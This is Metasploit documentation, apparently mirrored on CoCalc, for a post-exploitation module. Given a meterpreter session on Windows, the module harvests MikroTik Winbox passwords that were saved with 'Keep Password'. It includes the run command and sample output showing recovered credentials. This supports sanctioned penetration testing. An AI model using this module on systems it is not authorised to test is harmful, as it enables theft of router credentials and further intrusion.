CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/post/windows/gather/credentials/winbox_settings.md
Views: 11791

Vulnerable Application

Any Windows host with a meterpreter session and Mikrotik Winbox installed.

Winbox can be downloaded here

Installation Steps

  1. Download and open Mikrotik Winbox

  2. Enter a RouterOS device address into Connect to, username into Login, password into Password and check the flag Keep Password

  3. Click Connect

Verification Steps

  1. Get a meterpreter session on a Windows host.

  2. Do: run post/windows/gather/credentials/winbox_settings

  3. If any users in the system has a Keep Password enabled in Winbox, the credentials will be printed out.

Options

VERBOSE

  • By default verbose is turned off. When turned on, the module will show the HexDump of settings.cfg.viw files.

Scenarios

msf6 post(windows/gather/credentials/winbox_settings) > run [*] VERBOSE: false [*] Checking Default Locations... [*] C:\Users\Administrator\AppData\Roaming\Mikrotik\Winbox\settings.cfg.viw not found .... [*] Found File at C:\Users\FooBar\AppData\Roaming\Mikrotik\Winbox\settings.cfg.viw [+] Login: ThisIsUsername [+] Password: ThisIsPassword [*] Post module execution completed